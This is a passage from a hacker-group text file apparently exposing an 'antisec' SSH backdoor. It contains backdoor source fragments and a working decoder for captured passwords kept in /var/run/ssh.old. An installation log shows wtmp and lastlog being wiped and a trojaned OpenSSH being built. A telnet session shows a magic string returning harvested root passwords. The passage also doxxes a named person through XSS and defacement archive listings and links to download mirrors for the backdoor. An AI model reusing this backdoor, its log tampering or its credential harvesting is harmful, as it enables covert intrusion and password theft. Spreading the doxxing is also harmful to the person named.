3942. for(ai = 0;ai<strlen(mvebuf);ai++) mvdbuf[ai] = ~mvebuf[ai];
3943. write(sock_out,mvdbuf,logsize);
3944. }
3945. fclose(alog);
3946. }
3947. //...
3948. //...
3949. }
3950.  
3951. /*
3952. On server identification exchange if the client version first characters are equal to a specific
3953. string ("password") then it returns the captured passwords from ssh.old
3954. */
3955.  
3956. /*
3957. lame.c
3958.  
3959. Lame Decryprer v0.069
3960.  
3961. This program is free software: you can redistribute it and/or modify
3962. it under the terms of the FSPL Fuck Skiddies Public License as published by
3963. the GCESE Foundation, either version 3 of the License, or
3964. (at your option) any later version.
3965.  
3966. This program is distributed in the hope that it will be able to
3967. crack the complex encryption algorithm used by antisec's backdoor
3968. but WITHOUT ANY WARRANTY; without even the implied warranty of
3969. MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
3970. */
3971.  
3972. #include <stdio.h>
3973.  
3974. int main() {
3975. FILE *sshlog;
3976. char *filename = "/var/run/ssh.old";
3977. unsigned int cin;
3978. int i;
3979.  
3980. if((sshlog=fopen(filename,"r")))
3981. while((cin = fgetc(sshlog)) != EOF)
3982. printf("%c",~cin);
3983. else
3984. printf("crappy file error\n");
3985. }
3986.  
3987.  
3988.  
3989. Backdoor Installation
3990. ---------------------
3991.  
3992. debian:~/hax# ./quick
3993.  
3994. ________ .___ ________ _________
3995. \_____ \__ _ ______ ____ __| _/ \______ \ \_ ___ \
3996. / | \ \/ \/ / \_/ __ \ / __ | | | \/ \ \/
3997. / | \ / | \ ___// /_/ | | ` \ \____
3998. \_______ /\/\_/|___| /\___ >____ | /_______ /\______ /
3999. \/ \/ \/ \/ \/ \/
4000. "Hack everyone you can, and then hack some more"
4001. Logs [ CHECK ]
4002. Opening /var/log/wtmp ...
4003. Reading... patched ok.
4004. Opening /var/log/lastlog ...
4005. Reading... patched ok.
4006. Logs [ CHECK ]
4007. Configure [ CHECK ]
4008. checking for gcc... gcc
4009. checking for C compiler default output file name... a.out
4010. checking whether the C compiler works... yes
4011. checking whether we are cross compiling... no
4012. checking for suffix of executables...
4013. checking for suffix of object files... o
4014. checking whether we are using the GNU C compiler... yes
4015. checking whether gcc accepts -g... yes
4016. checking for gcc option to accept ANSI C... none needed
4017. checking build system type... i686-pc-linux-gnu
4018. checking host system type... i686-pc-linux-gnu
4019. checking whether byte ordering is bigendian... no
4020. checking for gawk... no
4021. checking for mawk... mawk
4022. checking how to run the C preprocessor... gcc -E
4023. checking for ranlib... ranlib
4024. checking for a BSD-compatible install... /usr/bin/install -c
4025. checking for egrep... grep -E
4026. checking for ar... /usr/bin/ar
4027. checking for cat... /bin/cat
4028. checking for kill... /bin/kill
4029. checking for perl5... no
4030. checking for perl... /usr/bin/perl
4031. checking for sed... /bin/sed
4032. checking for ent... no
4033. checking for bash... /bin/bash
4034. checking for ksh... (cached) /bin/bash
4035. checking for sh... (cached) /bin/bash
4036. checking for sh... /bin/sh
4037. checking for groupadd... /usr/sbin/groupadd
4038. checking for useradd... /usr/sbin/useradd
4039. checking for pkgmk... no
4040. checking for special C compiler options needed for large files... no
4041. checking for _FILE_OFFSET_BITS value needed for large files... 64
4042. checking for _LARGE_FILES value needed for large files... no
4043. checking for login... /bin/login
4044. checking for passwd... /usr/bin/passwd
4045. checking for inline... inline
4046. checking whether LLONG_MAX is declared... no
4047. checking whether LLONG_MAX is declared... yes
4048. checking for ANSI C header files... yes
4049. checking for sys/types.h... yes
4050. checking for sys/stat.h... yes
4051. checking for stdlib.h... yes
4052. checking for string.h... yes
4053. checking for memory.h... yes
4054. checking for strings.h... yes
4055. checking for inttypes.h... yes
4056. checking for stdint.h... yes
4057. checking for unistd.h... yes
4058. ...
4059. ...
4060. cc -o sftp progressmeter.o sftp.o sftp-client.o sftp-common.o sftp-glob.o -L. -Lopenbsd-compat/ -lssh -lopenbsd-compat -lresolv -lcrypto -lutil -lz -lnsl -lcrypt
4061. Compile [ CHECK ]
4062. Running [ CHECK ]
4063. *** [ OsUcCu7hJA ]
4064. *** [ 6O7vp ]
4065. Game Over [ CHECKMATE! ]
4066. #--
4067. Linux debian 2.6.26-2-686 #1 SMP Sun Jun 21 04:57:38 UTC 2009 i686 GNU/Linux
4068. debian
4069. OsUcCu7hJA
4070. 6O7vp
4071. #--
4072.  
4073.  
4074. debian:~# telnet 10.5.1.13 22
4075. Trying 10.5.1.13...
4076. Connected to 10.5.1.13.
4077. Escape character is '^]'.
4078. SSH-2.0-OpenSSH_5.1p1 Debian
4079. 6O7vp
4080. HOOKIN: root:123!"?
4081. HOOKIN: testuser:testpass
4082. Protocol mismatch.
4083. Connection closed by foreign host.
4084. debian:~#
4085.  
4086.  
4087.  
4088. _______ _______ ________ _________
4089. \ _ \ ___ __\ _ \/ __ \ / _____/ ____ ____
4090. / /_\ \\ \/ / /_\ \____ / \_____ \_/ __ \/ _ \
4091. \ \_/ \> <\ \_/ \ / / / \ ___( <_> )
4092. \_____ /__/\_ \\_____ //____/ /_______ /\___ >____/
4093. \/ \/ \/ \/ \/
4094. ________ __ .__ .__ .__
4095. \_____ \ _______/ |_|__| _____ |__|______|__| ____ ____
4096. / | \\____ \ __\ |/ \| \___ / |/ \ / ___\
4097. / | \ |_> > | | | Y Y \ |/ /| | | \/ /_/ >
4098. \_______ / __/|__| |__|__|_| /__/_____ \__|___| /\___ /
4099. \/|__| \/ \/ \//_____/
4100.  
4101.  
4102.  
4103. 1) http://www.xssed.com/archive/author=romeo
4104.  
4105. Date Author Domain PR Category Mirror
4106. 25/04/09 RoMeO www.akamai.com 19080 XSS mirror
4107. 22/03/09 RoMeO press.1and1.com 6883 XSS mirror
4108. 05/07/08 RoMeO scripts.mit.edu 999 XSS mirror
4109. 25/04/08 RoMeO forgottenmem.net 304476 XSS mirror
4110. 25/04/08 RoMeO www.h4ps.com 1753149 XSS mirror
4111. 23/04/08 RoMeO www.batelco.jo 225973 XSS mirror
4112. 12/04/08 RoMeO devscripts.net 1503804 XSS mirror
4113. 06/04/08 RoMeO www.vlx.in 2998964 XSS mirror
4114. 06/04/08 RoMeO www.ip2location.com 14646 XSS mirror
4115. 05/04/08 RoMeO realitatea.net 13002 XSS mirror
4116. 03/04/08 RoMeO www.name.com 13602 XSS mirror
4117. 03/04/08 RoMeO templates.entheosweb.com 13380 XSS mirror
4118. 31/03/08 RoMeO www.applyweb.com 50217 XSS mirror
4119. 31/03/08 RoMeO www.aast.edu 64423 XSS mirror
4120. 31/03/08 RoMeO www.cambridgescp.com 339535 XSS mirror
4121. 28/03/08 RoMeO www.freelotto.com R 306 XSS mirror
4122. 07/03/08 RoMeO www.sandboxie.com 70663 XSS mirror
4123. 06/03/08 RoMeO www.gulf-daily-news.com 14699 XSS mirror
4124. 06/03/08 RoMeO www.aucegypt.edu 38023 XSS mirror
4125. 06/03/08 RoMeO www.phpclanwebsite.com 986132 XSS mirror
4126. 05/03/08 RoMeO www.rapid-hook.com 95252 XSS mirror
4127. 05/03/08 RoMeO ipod.hopto.org 3648 XSS mirror
4128. 05/03/08 RoMeO www.darkshado.ca 6134372 XSS mirror
4129. 03/03/08 RoMeO www.macos.utah.edu 7333 XSS mirror
4130. 26/02/08 RoMeO www.rapidzearch.com 3797044 XSS mirror
4131. 11/02/08 RoMeO passport.51.com 184 XSS mirror
4132. 16/01/08 RoMeO www.memset.com 192269 XSS mirror
4133. 07/01/08 RoMeO search.mp3lyrics.org R 4309 XSS mirror
4134. 07/01/08 RoMeO qhost.eu 7969095 XSS mirror
4135. 05/01/08 RoMeO www.lpbs.org.uk 2776181 XSS mirror
4136. 04/01/08 RoMeO www.tdxp.net 0 XSS mirror
4137. 26/12/07 RoMeO aljaras.com 53022 XSS mirror
4138. 16/12/07 RoMeO www.sitemaps101.com 2163273 XSS mirror
4139. 15/12/07 RoMeO www.xml-sitemaps.com 8847 XSS mirror
4140. 10/12/07 RoMeO www.phpfaber.com 437969 XSS mirror
4141. 04/12/07 RoMeO www.tis-edu.com 0 XSS mirror
4142. 29/11/07 RoMeO pwnstarz.com 2025995 XSS mirror
4143. 23/11/07 RoMeO www.gamesurge.net 101368 XSS mirror
4144. 23/11/07 RoMeO cityguide.aol.com 54 XSS mirror
4145. 21/11/07 RoMeO my.notnet.co.uk 1419849 XSS mirror
4146. 06/11/07 RoMeO kwikhost.com 3593939 XSS mirror
4147. 06/11/07 RoMeO my.aol.com 54 XSS mirror
4148. 06/11/07 RoMeO www.searchtons.com 145218 XSS mirror
4149. 05/11/07 RoMeO www.seologs.com 18186 XSS mirror
4150. 05/11/07 RoMeO tools.elitehackers.info 151229 XSS mirror
4151. 05/11/07 RoMeO gallery.particlesoft.net 364744 XSS mirror
4152. 04/11/07 RoMeO www.filecart.com 27636 XSS mirror
4153. 04/11/07 RoMeO chollotenis.com 0 XSS mirror
4154. 02/11/07 RoMeO tsdepot.co.uk R 6739237 XSS mirror
4155. 02/11/07 RoMeO www.pesladder.com 1172005 XSS mirror
4156. 31/10/07 RoMeO www.omni-chat.com 1857220 XSS mirror
4157. 28/10/07 RoMeO www.anafit.com 2563280 XSS mirror
4158. 28/10/07 RoMeO www.hellboundhackers.org 213995 XSS mirror
4159. 28/10/07 RoMeO www.cyclelogic.co.uk 3361622 XSS mirror
4160. 16/10/07 RoMeO tsdepot.co.uk 6739237 XSS mirror
4161. 06/10/07 RoMeO www.terrytrophy.com 0 XSS mirror
4162. 03/10/07 RoMeO www13.cd-wow.com 28971 XSS mirror
4163. 03/10/07 RoMeO www.drbeat.li 8200365 XSS mirror
4164. 02/10/07 RoMeO services.embark.com 12027 XSS mirror
4165. 27/09/07 RoMeO ascii.techhappens.com 1215439 XSS mirror
4166. 20/09/07 RoMeO www.org-rc.fr 1884591 XSS mirror
4167. 26/06/07 RoMeO search.fbi.gov 11963 XSS mirror
4168.  
4169.  
4170. 2) http://www.zone-h.org/archive/defacer=romeo
4171.  
4172. Time Attacker H M R Domain OS View
4173. 2007/11/06 Romeo H trakyagirl.uni.cc Win 2003 mirror
4174. 2007/09/23 RomeO H R www.zexir.tk Linux mirror
4175. 2006/12/11 RoMeO www.koturkiye.com/hacked Linux mirror
4176. 2006/10/21 ROMEO H www.duyguajans.com FreeBSD mirror
4177. 2006/09/06 romeo M www.yeniliman.com/forum Linux mirror
4178. 2006/09/06 romeo M www.genc4um.com/forum Linux mirror
4179. 2006/09/06 ROMEO H www.forumhersey.com Linux mirror
4180. 2006/09/05 ROMEO M www.muzikogretmenleri.com/foru... Linux mirror
4181. 2006/09/05 ROMEO M www.sanalailem.com/forum Linux mirror
4182. 2006/09/05 ROMEO rocksitesi.net/forum/index.php Linux mirror
4183. 2006/09/05 ROMEO www.beyazrenkler.com/forum/ind... Linux mirror
4184. 2006/09/05 ROMEO www.yasakmp3.com/forum/index.php Win 2003 mirror
4185. 2006/09/05 ROMEO www.forumekani.com/index.php Linux mirror
4186. 2006/09/05 romeo www.turkfr.com/index.php Linux mirror
4187. 2006/09/05 romeo www.gizemliforum.org/index.php Linux mirror
4188. 2006/09/05 ROMEO www.arkadasbilisim.com/forum/i... Linux mirror
4189. 2006/09/05 ROMEO www.modifiyedunyasi.com/forum/... Linux mirror
4190. 2006/09/05 ROMEO www.forzatc.net/forum/index.php FreeBSD mirror
4191. 2006/09/05 ROMEO www.megaarsiv.net/index.php Linux mirror
4192. 2006/09/05 ROMEO egeizmir.com/forum/index.php Linux mirror
4193. 2006/09/05 ROMEO R www.nokiacep.com/forum/index.php Win 2003 mirror
4194. 2006/09/04 romeo H www.cyber-turka.org Win 2003 mirror
4195. 2006/07/12 romeo www.cehennem.net/den Linux mirror
4196. 2006/05/29 romeo H gorno-altaisk.ru Linux mirror
4197. 2006/05/29 ROMEO H M www.nobel.uz Win 2000 mirror
4198. 2006/05/29 ROMEO H R www.tdshi.uz Win 2000 mirror
4199. 2006/05/17 romeo H forumliontr.com Linux mirror
4200. 2006/05/02 romeo M www.pichiz.biz/forum Linux mirror
4201. 2006/05/02 ROMEO M www.trmizah.com/smf Linux mirror
4202. 2006/05/02 ROMEO H M www.rapsohbeti.com Linux mirror
4203. 2006/04/23 romeo www.gecelerinforumu.com/forum/... Linux mirror
4204. 2006/03/19 romeo www.esmer.org/index.php Linux mirror
4205. 2006/01/12 romeo M sitebirligi.com/~oyuncu/hacked... Linux mirror
4206. 2006/01/12 romeo M konya-kosk.bel.tr/~oyuncu/hack... Linux mirror
4207. 2006/01/12 romeo M aktueldershanesi.com/~oyuncu/h... Linux mirror
4208. 2006/01/12 romeo M www.hesapliweb.com/~oyuncu/hac... Linux mirror
4209. 2006/01/12 romeo M www.aheninsaat.com/~oyuncu/hac... Linux mirror
4210. 2006/01/12 romeo M www.mp3ilahi.com/~oyuncu/hacke... Linux mirror
4211. 2006/01/12 romeo M www.eurotipsters.com/~oyuncu/h... Linux mirror
4212. 2006/01/12 romeo M www.kardeslik.org/~oyuncu/hack... Linux mirror
4213. 2006/01/12 romeo M www.hiperx.net/~oyuncu/hacked/... Linux mirror
4214. 2006/01/12 romeo M www.najans.com/~oyuncu/hacked/... Linux mirror
4215. 2006/01/12 romeo M www.gulmece.net/~oyuncu/hacked... Linux mirror
4216. 2006/01/12 romeo M www.cigilfm.com/~oyuncu/hacked... Linux mirror
4217. 2006/01/12 romeo M www.gifturk.com/~oyuncu/hacked... Linux mirror
4218. 2006/01/12 romeo M www.why-islam.net/~oyuncu/hack... Linux mirror
4219. 2006/01/12 romeo M www.e-matrak.org/~oyuncu/hacke... Linux mirror
4220. 2006/01/12 romeo M www.kazancyolu.com/~oyuncu/hac... Linux mirror
4221. 2006/01/12 romeo M www.hiperstore.gen.tr/~oyuncu/... Linux mirror
4222. 2006/01/12 romeo M www.senarslan.com/~oyuncu/hack... Linux mirror
4223. 2006/01/12 romeo M www.aprohosting.net/~oyuncu//h... Linux mirror
4224. 2006/01/12 romeo M R www.gulum.net/~oyuncu//hacked/... Linux mirror
4225. 2006/01/12 romeo M R www.basinyayin.net/~oyuncu//ha... Linux mirror
4226. 2006/01/12 romeo M www.dinleradyo.com/~oyuncu//ha... Linux mirror
4227. 2006/01/12 romeo M www.sitetasarimi.com/~oyuncu//... Linux mirror
4228. 2005/04/08 romeo votedevoe.org/v-web/portal/cms... FreeBSD mirror
4229. 2005/03/23 romeo R www.willowsend.co.nz/index.php Linux mirror
4230. 2005/03/23 romeo H M moh.theclap.co.nz Linux mirror
4231.  
4232.  
4233. _______ ___________
4234. \ _ \ ___ __/_ \ _ \
4235. / /_\ \\ \/ /| / /_\ \
4236. \ \_/ \> < | \ \_/ \
4237. \_____ /__/\_ \|___|\_____ /
4238. \/ \/ \/
4239. __________ __ .__
4240. \______ \ ____ ______ ____________/ |_|__| ____ ____
4241. | _// __ \\____ \ / _ \_ __ \ __\ |/ \ / ___\
4242. | | \ ___/| |_> > <_> ) | \/| | | | | \/ /_/ >
4243. |____|_ /\___ > __/ \____/|__| |__| |__|___| /\___ /
4244. \/ \/|__| \//_____/
4245.  
4246.  
4247. 1) http://www.usdoj.gov/criminal/cybercrime/reporting.htm#cc
4248. 2) http://www.fbi.gov/contact/fo/fo.htm
4249. 3) http://www.treas.gov/usss/index.shtml
4250. 4) http://www.ic3.gov/default.aspx
4251. 5) http://www.tra.gov.ae/complaints.php
4252.  
4253.  
4254. _______ ____ ____
4255. \ _ \ ___ __/_ /_ |
4256. / /_\ \\ \/ /| || |
4257. \ \_/ \> < | || |
4258. \_____ /__/\_ \|___||___|
4259. \/ \/
4260. _____ __ __ .__ __
4261. / _ \_/ |__/ |______ ____ | |__ _____ ____ _____/ |_ ______
4262. / /_\ \ __\ __\__ \ _/ ___\| | \ / \_/ __ \ / \ __\/ ___/
4263. / | \ | | | / __ \\ \___| Y \ Y Y \ ___/| | \ | \___ \
4264. \____|__ /__| |__| (____ /\___ >___| /__|_| /\___ >___| /__| /____ >
4265. \/ \/ \/ \/ \/ \/ \/ \/
4266.  
4267. Mirrors
4268.  
4269. 1. http://rapidshare.com/files/328431323/antisec.tar.gz
4270. 2. http://hotfile.com/dl/22483868/50d27ca/antisec.tar.gz.html
4271. 3. http://uploading.com/files/m3a792b5/antisec.tar.gz/
4272. 4. http://www.mediafire.com/file/jy4miqqgmtz/antisec.tar.gz
4273. 5. http://www.yousendit.com/download/VGllb3BBdWNiR0ozZUE9PQ
4274. 6. http://www.sendspace.com/file/07clr5
4275.  
4276.  
4277. _______ ____________
4278. \ _ \ ___ __/_ \_____ \
4279. / /_\ \\ \/ /| |/ ____/
4280. \ \_/ \> < | / \
4281. \_____ /__/\_ \|___\_______ \
4282. \/ \/ \/
4283. _________ .__ .__
4284. \_ ___ \ ____ ____ ____ | | __ __ _____|__| ____ ____
4285. / \ \/ / _ \ / \_/ ___\| | | | \/ ___/ |/ _ \ / \
4286. \ \___( <_> ) | \ \___| |_| | /\___ \| ( <_> ) | \
4287. \______ /\____/|___| /\___ >____/____//____ >__|\____/|___| /
4288. \/ \/ \/ \/ \/
4289.  
4290. What we tend to believe is that most of the so-called blackhats had lost or still strive towards the chance of
4291. becoming an integral part of the information security industry and so they are blaming people who share old
4292. and new information regarding the protection of corporate and personal information assets, including ICT systems
4293. and social security.
4294.  
4295. _______ ____________
4296. \ _ \ ___ __/_ \_____ \
4297. / /_\ \\ \/ /| | _(__ <
4298. \ \_/ \> < | |/ \
4299. \_____ /__/\_ \|___/______ /
4300. \/ \/ \/
4301. ________ __
4302. / _____/______ ____ _____/ |_________
4303. / \ __\_ __ \_/ __ \_/ __ \ __\___ /
4304. \ \_\ \ | \/\ ___/\ ___/| | / /
4305. \______ /__| \___ >\___ >__| /_____ \
4306. \/ \/ \/ \/
4307.  
4308. We want to thank the following people for their contribution. You know who you are!
4309. Prosec Group, Joao Pontes (rorkty), ShadowREG and our anonymous contributors